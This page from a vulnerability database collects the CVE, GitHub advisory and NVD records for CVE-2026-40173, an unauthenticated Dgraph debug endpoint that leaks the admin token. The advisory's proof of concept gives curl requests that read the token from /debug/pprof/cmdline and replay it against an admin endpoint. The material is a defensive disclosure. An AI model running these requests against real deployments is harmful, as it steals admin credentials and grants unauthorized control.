Vulnerability-Lookup

CVE-2026-40173 (GCVE-0-2026-40173)

Vulnerability from cvelistv5 – Published: 2026-04-15 20:40 – Updated: 2026-04-16 12:05

Title

Dgraph: Unauthenticated pprof endpoint leaks admin auth token

Summary

Dgraph is an open source distributed GraphQL database. Versions 25.3.1 and prior contain an unauthenticated credential disclosure vulnerability where the /debug/pprof/cmdline endpoint is registered on the default mux and reachable without authentication, exposing the full process command line including the admin token configured via the --security "token=..." startup flag. An attacker can retrieve the leaked token and reuse it in the X-Dgraph-AuthToken header to gain unauthorized access to admin-only endpoints such as /admin/config/cache_mb, bypassing the adminAuthHandler token validation. This enables unauthorized privileged administrative access including configuration changes and operational control actions in any deployment where the Alpha HTTP port is reachable by untrusted parties. This issue has been fixed in version 25.3.2.

Severity ?

9.4 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

CWE

CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
CWE-215 - Insertion of Sensitive Information Into Debugging Code

Assigner

GitHub_M

References

URL

Tags

	https://github.com/dgraph-io/dgraph/security/advi…	x_refsource_CONFIRM
	https://github.com/dgraph-io/dgraph/releases/tag/…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	dgraph-io	dgraph	Affected: < 25.3.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-40173",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-16T11:26:03.429575Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-16T12:05:10.186Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/dgraph-io/dgraph/security/advisories/GHSA-95mq-xwj4-r47p"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "dgraph",
          "vendor": "dgraph-io",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 25.3.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Dgraph is an open source distributed GraphQL database. Versions 25.3.1 and prior contain an unauthenticated credential disclosure vulnerability where the /debug/pprof/cmdline endpoint is registered on the default mux and reachable without authentication, exposing the full process command line including the admin token configured via the --security \"token=...\" startup flag. An attacker can retrieve the leaked token and reuse it in the X-Dgraph-AuthToken header to gain unauthorized access to admin-only endpoints such as /admin/config/cache_mb, bypassing the adminAuthHandler token validation. This enables unauthorized privileged administrative access including configuration changes and operational control actions in any deployment where the Alpha HTTP port is reachable by untrusted parties. This issue has been fixed in version 25.3.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 9.4,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-215",
              "description": "CWE-215: Insertion of Sensitive Information Into Debugging Code",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-15T20:40:47.186Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/dgraph-io/dgraph/security/advisories/GHSA-95mq-xwj4-r47p",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/dgraph-io/dgraph/security/advisories/GHSA-95mq-xwj4-r47p"
        },
        {
          "name": "https://github.com/dgraph-io/dgraph/releases/tag/v25.3.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/dgraph-io/dgraph/releases/tag/v25.3.2"
        }
      ],
      "source": {
        "advisory": "GHSA-95mq-xwj4-r47p",
        "discovery": "UNKNOWN"
      },
      "title": "Dgraph: Unauthenticated pprof endpoint leaks admin auth token"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-40173",
    "datePublished": "2026-04-15T20:40:47.186Z",
    "dateReserved": "2026-04-09T20:59:17.618Z",
    "dateUpdated": "2026-04-16T12:05:10.186Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-40173",
      "date": "2026-04-16",
      "epss": "0.00104",
      "percentile": "0.28329"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-40173\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-15T21:17:27.197\",\"lastModified\":\"2026-04-16T13:16:49.943\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Dgraph is an open source distributed GraphQL database. Versions 25.3.1 and prior contain an unauthenticated credential disclosure vulnerability where the /debug/pprof/cmdline endpoint is registered on the default mux and reachable without authentication, exposing the full process command line including the admin token configured via the --security \\\"token=...\\\" startup flag. An attacker can retrieve the leaked token and reuse it in the X-Dgraph-AuthToken header to gain unauthorized access to admin-only endpoints such as /admin/config/cache_mb, bypassing the adminAuthHandler token validation. This enables unauthorized privileged administrative access including configuration changes and operational control actions in any deployment where the Alpha HTTP port is reachable by untrusted parties. This issue has been fixed in version 25.3.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L\",\"baseScore\":9.4,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":5.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-200\"},{\"lang\":\"en\",\"value\":\"CWE-215\"}]}],\"references\":[{\"url\":\"https://github.com/dgraph-io/dgraph/releases/tag/v25.3.2\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/dgraph-io/dgraph/security/advisories/GHSA-95mq-xwj4-r47p\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/dgraph-io/dgraph/security/advisories/GHSA-95mq-xwj4-r47p\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"Dgraph: Unauthenticated pprof endpoint leaks admin auth token\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-200\", \"lang\": \"en\", \"description\": \"CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\", \"type\": \"CWE\"}]}, {\"descriptions\": [{\"cweId\": \"CWE-215\", \"lang\": \"en\", \"description\": \"CWE-215: Insertion of Sensitive Information Into Debugging Code\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"LOW\", \"baseScore\": 9.4, \"baseSeverity\": \"CRITICAL\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"scope\": \"UNCHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/dgraph-io/dgraph/security/advisories/GHSA-95mq-xwj4-r47p\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/dgraph-io/dgraph/security/advisories/GHSA-95mq-xwj4-r47p\"}, {\"name\": \"https://github.com/dgraph-io/dgraph/releases/tag/v25.3.2\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/dgraph-io/dgraph/releases/tag/v25.3.2\"}], \"affected\": [{\"vendor\": \"dgraph-io\", \"product\": \"dgraph\", \"versions\": [{\"version\": \"\u003c 25.3.2\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-15T20:40:47.186Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Dgraph is an open source distributed GraphQL database. Versions 25.3.1 and prior contain an unauthenticated credential disclosure vulnerability where the /debug/pprof/cmdline endpoint is registered on the default mux and reachable without authentication, exposing the full process command line including the admin token configured via the --security \\\"token=...\\\" startup flag. An attacker can retrieve the leaked token and reuse it in the X-Dgraph-AuthToken header to gain unauthorized access to admin-only endpoints such as /admin/config/cache_mb, bypassing the adminAuthHandler token validation. This enables unauthorized privileged administrative access including configuration changes and operational control actions in any deployment where the Alpha HTTP port is reachable by untrusted parties. This issue has been fixed in version 25.3.2.\"}], \"source\": {\"advisory\": \"GHSA-95mq-xwj4-r47p\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-40173\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-16T11:26:03.429575Z\"}}}], \"references\": [{\"url\": \"https://github.com/dgraph-io/dgraph/security/advisories/GHSA-95mq-xwj4-r47p\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-16T11:26:13.684Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-40173\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2026-04-09T20:59:17.618Z\", \"datePublished\": \"2026-04-15T20:40:47.186Z\", \"dateUpdated\": \"2026-04-16T12:05:10.186Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-95MQ-XWJ4-R47P

Vulnerability from github – Published: 2026-04-16 21:08 – Updated: 2026-04-16 21:08

Summary

Dgraph: Unauthenticated /debug/pprof/cmdline discloses admin auth token, enabling unauthorized access to protected Alpha admin endpoints

Details

Summary

An unauthenticated debug endpoint in Dgraph Alpha exposes the full process command line, including the configured admin token from --security "token=...".

This does not break token validation logic directly; instead, it discloses the credential and enables unauthorized admin-level access by reusing the leaked token in X-Dgraph-AuthToken.

Details

The behavior occurs entirely within core Alpha HTTP routing and does not require any external proxy, plugin, or non-core integration.

The core issue is not that admin token protection is absent, but that the protected secret is exposed in cleartext through an unauthenticated core debug endpoint.

Relevant code paths: - dgraph/cmd/alpha/run.go:17 imports net/http/pprof, which registers /debug/pprof/* handlers on the default mux. - dgraph/cmd/alpha/run.go:533 uses http.Handle("/", audit.AuditRequestHttp(baseMux)), so default-mux handlers remain reachable. - dgraph/cmd/alpha/admin.go:52 enforces admin token checks in adminAuthHandler for admin endpoints. - dgraph/cmd/alpha/admin.go:74 shows /admin/config/cache_mb behind adminAuthHandler.

Credential-exposure chain: 1. /debug/pprof/cmdline is reachable without authentication. 2. Its output includes the configured admin token from process arguments. 3. The disclosed token is accepted by adminAuthHandler when sent as X-Dgraph-AuthToken. 4. An attacker gains unauthorized access to admin-only functionality.

Observed local evidence (safe validation): - Request: GET /admin/config/cache_mb without token - Status: 200 (request rejected at application layer) - Body contains error: Invalid X-Dgraph-AuthToken - The endpoint returns HTTP 200 but indicates authentication failure in the response body. - Request: GET /debug/pprof/cmdline without token - Status: 200 - Body excerpt includes: --security=token=TopSecretToken123; - Request: GET /admin/config/cache_mb with X-Dgraph-AuthToken: TopSecretToken123 - Status: 200 - Body: 4096

Important policy/triage clarification: - This issue persists even when the admin-token security feature is enabled: the token itself is exposed via an unauthenticated core debug endpoint, making this more than a misconfiguration-only concern. - Network restrictions (bind/whitelist/firewall) may reduce exposure, but they do not remediate the underlying credential disclosure behavior.

PoC

Branch: main
Commit: b15c87e93
Describe: v25.3.1

Preconditions: - Alpha HTTP port is reachable by attacker traffic. - Admin token is configured via supported startup flag: --security "token=...". - /debug/pprof/* is exposed on the same Alpha HTTP listener. - This behavior occurs with documented startup flags and without any non-default or unsupported configuration.

Reproduction steps: 1. Start Zero and Alpha (example local setup): - dgraph zero --my=127.0.0.1:5280 --port_offset=200 --bindall=false --wal=./zw - dgraph alpha --my=127.0.0.1:7280 --zero=127.0.0.1:5280 --port_offset=200 --bindall=false --security "token=TopSecretToken123;" --postings=./p --wal=./w --tmp=./t

Verify admin endpoint rejects unauthenticated request:
curl -i http://127.0.0.1:8280/admin/config/cache_mb
Expected body includes Invalid X-Dgraph-AuthToken.
Read token from unauthenticated debug endpoint:
curl -s http://127.0.0.1:8280/debug/pprof/cmdline
Expected output includes --security=token=TopSecretToken123;.
Reuse leaked token against admin endpoint:
curl -i -H "X-Dgraph-AuthToken: TopSecretToken123" http://127.0.0.1:8280/admin/config/cache_mb
Expected: successful response (example observed: 4096).

Note: The PoC uses 127.0.0.1 only for safe local validation. The vulnerable condition is unauthenticated reachability of /debug/pprof/cmdline; in any deployment where Alpha HTTP is reachable by untrusted parties, the same token disclosure and subsequent unauthorized admin access apply.

Impact

Unauthenticated disclosure of a sensitive admin credential via debug endpoint, enabling unauthorized privileged administrative access through token reuse
Operators running Dgraph Alpha with admin token configured, where Alpha HTTP/debug routes are reachable by untrusted users or networks.

The attack requires network reachability to the Alpha HTTP port. In deployments where this interface is exposed beyond trusted boundaries, the issue is remotely exploitable without authentication.

Depending on exposed admin functionality in deployment policy, this may allow configuration changes, operational control actions, and other privileged administrative operations exposed through /admin/*.

Severity ?

9.4 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/dgraph-io/dgraph/v25"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "25.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/dgraph-io/dgraph/v24"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "24.1.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/dgraph-io/dgraph"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.2.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40173"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-215"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T21:08:07Z",
    "nvd_published_at": "2026-04-15T21:17:27Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nAn unauthenticated debug endpoint in Dgraph Alpha exposes the full process command line, including the configured admin token from `--security \"token=...\"`.\n\nThis does not break token validation logic directly; instead, it discloses the credential and enables unauthorized admin-level access by reusing the leaked token in `X-Dgraph-AuthToken`.\n\n### Details\nThe behavior occurs entirely within core Alpha HTTP routing and does not require any external proxy, plugin, or non-core integration.\n\nThe core issue is not that admin token protection is absent, but that the protected secret is exposed in cleartext through an unauthenticated core debug endpoint.\n\nRelevant code paths:\n- `dgraph/cmd/alpha/run.go:17` imports `net/http/pprof`, which registers `/debug/pprof/*` handlers on the default mux.\n- `dgraph/cmd/alpha/run.go:533` uses `http.Handle(\"/\", audit.AuditRequestHttp(baseMux))`, so default-mux handlers remain reachable.\n- `dgraph/cmd/alpha/admin.go:52` enforces admin token checks in `adminAuthHandler` for admin endpoints.\n- `dgraph/cmd/alpha/admin.go:74` shows `/admin/config/cache_mb` behind `adminAuthHandler`.\n\nCredential-exposure chain:\n1. `/debug/pprof/cmdline` is reachable without authentication.\n2. Its output includes the configured admin token from process arguments.\n3. The disclosed token is accepted by `adminAuthHandler` when sent as `X-Dgraph-AuthToken`.\n4. An attacker gains unauthorized access to admin-only functionality.\n\nObserved local evidence (safe validation):\n- Request: `GET /admin/config/cache_mb` without token\n  - Status: 200 (request rejected at application layer)\n  - Body contains error: `Invalid X-Dgraph-AuthToken`\n  - The endpoint returns HTTP 200 but indicates authentication failure in the response body.\n- Request: `GET /debug/pprof/cmdline` without token\n  - Status: 200\n  - Body excerpt includes: `--security=token=TopSecretToken123;`\n- Request: `GET /admin/config/cache_mb` with `X-Dgraph-AuthToken: TopSecretToken123`\n  - Status: 200\n  - Body: `4096`\n\nImportant policy/triage clarification:\n- This issue persists even when the admin-token security feature is enabled: the token itself is exposed via an unauthenticated core debug endpoint, making this more than a misconfiguration-only concern.\n- Network restrictions (bind/whitelist/firewall) may reduce exposure, but they do not remediate the underlying credential disclosure behavior.\n\n### PoC\n\n- Branch: `main`\n- Commit: `b15c87e93`\n- Describe: `v25.3.1`\n\nPreconditions:\n- Alpha HTTP port is reachable by attacker traffic.\n- Admin token is configured via supported startup flag: `--security \"token=...\"`.\n- `/debug/pprof/*` is exposed on the same Alpha HTTP listener.\n- This behavior occurs with documented startup flags and without any non-default or unsupported configuration.\n\nReproduction steps:\n1. Start Zero and Alpha (example local setup):\n   - `dgraph zero --my=127.0.0.1:5280 --port_offset=200 --bindall=false --wal=./zw`\n   - `dgraph alpha --my=127.0.0.1:7280 --zero=127.0.0.1:5280 --port_offset=200 --bindall=false --security \"token=TopSecretToken123;\" --postings=./p --wal=./w --tmp=./t`\n\n2. Verify admin endpoint rejects unauthenticated request:\n   - `curl -i http://127.0.0.1:8280/admin/config/cache_mb`\n   - Expected body includes `Invalid X-Dgraph-AuthToken`.\n\n3. Read token from unauthenticated debug endpoint:\n   - `curl -s http://127.0.0.1:8280/debug/pprof/cmdline`\n   - Expected output includes `--security=token=TopSecretToken123;`.\n\n4. Reuse leaked token against admin endpoint:\n   - `curl -i -H \"X-Dgraph-AuthToken: TopSecretToken123\" http://127.0.0.1:8280/admin/config/cache_mb`\n   - Expected: successful response (example observed: `4096`).\n\nNote: The PoC uses `127.0.0.1` only for safe local validation. The vulnerable condition is unauthenticated reachability of `/debug/pprof/cmdline`; in any deployment where Alpha HTTP is reachable by untrusted parties, the same token disclosure and subsequent unauthorized admin access apply.\n\n### Impact\n\n- Unauthenticated disclosure of a sensitive admin credential via debug endpoint, enabling unauthorized privileged administrative access through token reuse\n- Operators running Dgraph Alpha with admin token configured, where Alpha HTTP/debug routes are reachable by untrusted users or networks.\n\nThe attack requires network reachability to the Alpha HTTP port. In deployments where this interface is exposed beyond trusted boundaries, the issue is remotely exploitable without authentication.\n\nDepending on exposed admin functionality in deployment policy, this may allow configuration changes, operational control actions, and other privileged administrative operations exposed through `/admin/*`.",
  "id": "GHSA-95mq-xwj4-r47p",
  "modified": "2026-04-16T21:08:07Z",
  "published": "2026-04-16T21:08:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dgraph-io/dgraph/security/advisories/GHSA-95mq-xwj4-r47p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40173"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dgraph-io/dgraph"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dgraph-io/dgraph/releases/tag/v25.3.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dgraph: Unauthenticated /debug/pprof/cmdline discloses admin auth token, enabling unauthorized access to protected Alpha admin endpoints"
}

FKIE_CVE-2026-40173

Vulnerability from fkie_nvd - Published: 2026-04-15 21:17 - Updated: 2026-04-16 13:16

Severity ?

9.4 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/dgraph-io/dgraph/releases/tag/v25.3.2
	security-advisories@github.com	https://github.com/dgraph-io/dgraph/security/advisories/GHSA-95mq-xwj4-r47p
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/dgraph-io/dgraph/security/advisories/GHSA-95mq-xwj4-r47p

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Dgraph is an open source distributed GraphQL database. Versions 25.3.1 and prior contain an unauthenticated credential disclosure vulnerability where the /debug/pprof/cmdline endpoint is registered on the default mux and reachable without authentication, exposing the full process command line including the admin token configured via the --security \"token=...\" startup flag. An attacker can retrieve the leaked token and reuse it in the X-Dgraph-AuthToken header to gain unauthorized access to admin-only endpoints such as /admin/config/cache_mb, bypassing the adminAuthHandler token validation. This enables unauthorized privileged administrative access including configuration changes and operational control actions in any deployment where the Alpha HTTP port is reachable by untrusted parties. This issue has been fixed in version 25.3.2."
    }
  ],
  "id": "CVE-2026-40173",
  "lastModified": "2026-04-16T13:16:49.943",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 9.4,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.5,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-15T21:17:27.197",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/dgraph-io/dgraph/releases/tag/v25.3.2"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/dgraph-io/dgraph/security/advisories/GHSA-95mq-xwj4-r47p"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/dgraph-io/dgraph/security/advisories/GHSA-95mq-xwj4-r47p"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        },
        {
          "lang": "en",
          "value": "CWE-215"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-40173 (GCVE-0-2026-40173)

GHSA-95MQ-XWJ4-R47P

Summary

Details

PoC

Impact

FKIE_CVE-2026-40173

Tags

Sightings

Nomenclature